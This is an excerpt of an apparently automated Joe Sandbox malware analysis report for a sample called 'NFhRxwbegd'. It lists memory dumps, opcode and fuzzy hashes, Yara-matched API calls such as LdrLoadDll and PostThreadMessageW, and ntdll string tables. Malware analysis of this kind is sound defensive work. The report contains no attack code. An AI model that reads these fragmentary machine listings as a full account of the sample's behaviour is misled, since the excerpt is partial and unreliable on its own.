                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0ni
                                                                      • API String ID: 0-1488673370
                                                                      • Opcode ID: 2143e60ac6b44e063b886754610b324ff5ffc156578f51decc4cee866ca32db1
                                                                      • Instruction ID: 5aef71ea98c76145e92bcb4c2ddad56e60092ddd33e2d1598225db0f63160c67
                                                                      • Opcode Fuzzy Hash: 2143e60ac6b44e063b886754610b324ff5ffc156578f51decc4cee866ca32db1
                                                                      • Instruction Fuzzy Hash: E9513B71E016598BDB68DF6B8D4479AFAF3AFC8300F14C1BA950DA6254EB340A858F51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6bd0ed32ada6dedf1b0a45081740f3a65cb0cc5d99721995d49d073eb4b3af8
                                                                      • Instruction ID: 545340d3dd08a7ec7f15d15ffef9af78886633ad66431a30c271c08474beec52
                                                                      • Opcode Fuzzy Hash: e6bd0ed32ada6dedf1b0a45081740f3a65cb0cc5d99721995d49d073eb4b3af8
                                                                      • Instruction Fuzzy Hash: 83E10A74E002599FDB14DFA9C980AAEFBF2FF89305F248169D814AB355D7349941CFA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 607cd5a72ab43167eefaec78b630f2721639c5276d84ebd9094b1e890132989f
                                                                      • Instruction ID: b843d3ecdf4311dd01fba2f34dc967f91448c18932ebc1ffa2e5a6703d6e8c7c
                                                                      • Opcode Fuzzy Hash: 607cd5a72ab43167eefaec78b630f2721639c5276d84ebd9094b1e890132989f
                                                                      • Instruction Fuzzy Hash: C7E10974E002598FDB14DFA9C580AAEFBF2FF89305F248169D854AB355D730A942CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71f8f55e74cffbb7a2a845055474a815e6cbf586d0559a74d5d0914cf99932be
                                                                      • Instruction ID: 5862429aedfb2509149969e548b3a37bd2518d86e23a0de0a28ac38ebceefd0b
                                                                      • Opcode Fuzzy Hash: 71f8f55e74cffbb7a2a845055474a815e6cbf586d0559a74d5d0914cf99932be
                                                                      • Instruction Fuzzy Hash: A1E13674E002198FDB14DFA9C580AAEFBF2BF89301F24C169D914AB355D730A942CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0dc7f287326d102e1dc5793078e77fcbf1d2e38cd924c7b3189c90323e8e2d7
                                                                      • Instruction ID: 174dea4f0ded69e58d4f67fb03a43b6559115c83a5bcc1669089443fa7e28dbe
                                                                      • Opcode Fuzzy Hash: a0dc7f287326d102e1dc5793078e77fcbf1d2e38cd924c7b3189c90323e8e2d7
                                                                      • Instruction Fuzzy Hash: 1EE1FB74E002598FDB14DFA9C980AAEFBF2FF89305F248169D814A7355D730A942CFA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e7659c7de623f2e3024871874f3de6080b78f21ba7501331b1f54a9d1354bed
                                                                      • Instruction ID: f0a9b963f5213ccb577e26d5496d1203bc19fbb3b043982e0fa8d125b8198cce
                                                                      • Opcode Fuzzy Hash: 1e7659c7de623f2e3024871874f3de6080b78f21ba7501331b1f54a9d1354bed
                                                                      • Instruction Fuzzy Hash: A3E10974E002598FDB14DFA9C580AAEFBF2BF89305F24C169D818AB355D731A941CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 029c97497e063afc93de43518467e14709eb4b258f249d85a6220fba7671e09d
                                                                      • Instruction ID: c4e48d82dbbf1b7c173522fbbadcda8fc242ae46fa81c09e3bdda7727ca9f829
                                                                      • Opcode Fuzzy Hash: 029c97497e063afc93de43518467e14709eb4b258f249d85a6220fba7671e09d
                                                                      • Instruction Fuzzy Hash: 93A15E36E00209CFCF05DFA5C8409AEB7B2FF85300B1A857AE905AB265DB75E955CB60
                                                                      Memory Dump Source

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:5.3%
                                                                      Signature Coverage:8.3%
                                                                      Total number of Nodes:132
                                                                      Total number of Limit Nodes:9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 253 417d83-417dac call 42f8d3 256 417db2-417dc0 call 42fed3 253->256 257 417dae-417db1 253->257 260 417dd0-417de1 call 42e383 256->260 261 417dc2-417dcd call 430173 256->261 266 417de3-417df7 LdrLoadDll 260->266 267 417dfa-417dfd 260->267 261->260 266->267
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                      • Instruction ID: 88b9ef28133dc456cab6c81c5f600716b01c30102915f9fd8f3ec612534eff34
                                                                      • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                      • Instruction Fuzzy Hash: 23011EB5E0020DABDF10DAE5DC42FEEB3789F54308F0081AAE90897241F635EB598B95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 278 42ccb3-42ccec call 404623 call 42dea3 NtClose
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction ID: d46bfabfc098e6d5a2aad821b6b2a61ea91c21e50ceafb7c4f345b9124cf626d
                                                                      • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction Fuzzy Hash: 98E026366006043BC210FA6ADC01FD7776CDFC5B10F000819FA0867242C7B4B90087F4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0

                                                                      Control-flow Graph

                                                                      control_flow_graph 0 4145a8-4145ae 1 4145b0-4145c4 0->1 2 414628-414641 0->2 3 414663-414668 2->3 4 414643-414654 PostThreadMessageW 2->4 4->3 5 414656-414660 4->5 5->3
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 04I_$086604I_P$086604I_P
                                                                      • API String ID: 1836367815-762223272

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 086604I_P$086604I_P
                                                                      • API String ID: 1836367815-368392577

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 086604I_P$086604I_P
                                                                      • API String ID: 1836367815-368392577

                                                                      Control-flow Graph

                                                                      control_flow_graph 231 417e46-417e49 232 417dd8-417de1 231->232 233 417e4b-417e52 231->233 234 417de3-417df7 LdrLoadDll 232->234 235 417dfa-417dfd 232->235 236 417e54-417e68 233->236 237 417e3a-417e3c 233->237 234->235 240 417e69-417e7a 236->240 238 417e3f-417e41 237->238 239 417e3e 237->239 241 417e01-417e02 238->241 242 417e43-417e44 238->242 239->238 244 417e7b-417e9b 240->244 244->244 245 417e9d-417e9f 244->245 246 417ea1 245->246 247 417eff-417f3e call 42f933 call 42bcb3 245->247 246->240 248 417ea3-417ea5 246->248 248->247
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0

                                                                      Control-flow Graph

                                                                      control_flow_graph 273 42d003-42d044 call 404623 call 42dea3 RtlFreeHeap
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,004175E7,000000F4), ref: 0042D03F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0

                                                                      Control-flow Graph

                                                                      control_flow_graph 268 42cfb3-42cff4 call 404623 call 42dea3 RtlAllocateHeap
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,0041EB4E,?,?,00000000,?,0041EB4E,?,?,?), ref: 0042CFEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0

                                                                      Control-flow Graph

                                                                      control_flow_graph 283 42d053-42d08c call 404623 call 42dea3 ExitProcess
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,B9F6A3FE,?,?,B9F6A3FE), ref: 0042D087
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0

                                                                      Control-flow Graph

                                                                      control_flow_graph 288 1912c0a-1912c0f 289 1912c11-1912c18 288->289 290 1912c1f-1912c26 LdrInitializeThunk 288->290
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2160512332
                                                                      Strings
                                                                      • Critical section debug info address, xrefs: 0194541F, 0194552E
                                                                      • corrupted critical section, xrefs: 019454C2
                                                                      • Thread identifier, xrefs: 0194553A
                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019454CE
                                                                      • Invalid debug info address of this critical section, xrefs: 019454B6
                                                                      • Critical section address., xrefs: 01945502
                                                                      • Address of the debug info found in the active list., xrefs: 019454AE, 019454FA
                                                                      • 8, xrefs: 019452E3
                                                                      • Critical section address, xrefs: 01945425, 019454BC, 01945534
                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019454E2
                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01945543
                                                                      • undeleted critical section in freed memory, xrefs: 0194542B
                                                                      • double initialized or corrupted critical section, xrefs: 01945508
                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0194540A, 01945496, 01945519
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                      • API String ID: 0-2368682639
                                                                      Strings
                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01942602
                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01942409
                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0194261F
                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01942624
                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01942506
                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01942498
                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019422E4
                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019425EB
                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019424C0
                                                                      • @, xrefs: 0194259B
                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01942412
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                      Strings
                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01958A3D
                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01958A67
                                                                      • HandleTraces, xrefs: 01958C8F
                                                                      • VerifierDlls, xrefs: 01958CBD
                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01958B8F
                                                                      • VerifierFlags, xrefs: 01958C50
                                                                      • VerifierDebug, xrefs: 01958CA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • LdrpInitShimEngine, xrefs: 019299F4, 01929A07, 01929A30
                                                                      • Getting the shim user exports failed with status 0x%08lx, xrefs: 01929A01
                                                                      • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 019299ED
                                                                      • apphelp.dll, xrefs: 018C6496
                                                                      • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01929A2A
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01929A11, 01929A3A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01948170
                                                                      • LdrpInitializeImportRedirection, xrefs: 01948177, 019481EB
                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 019481E5
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01948181, 019481F5
                                                                      • LdrpInitializeProcess, xrefs: 0190C6C4
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0190C6C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                      Strings
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01942178
                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01942160, 0194219A, 019421BA
                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0194219F
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01942180
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019421BF
                                                                      • SXS: %s() passed the empty activation context, xrefs: 01942165
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                      APIs
                                                                        • Part of subcall function 01912DF0: LdrInitializeThunk.NTDLL ref: 01912DFA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910BA3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910BB6
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910D60
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                      • String ID:
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                      Strings
                                                                      • @, xrefs: 01908591
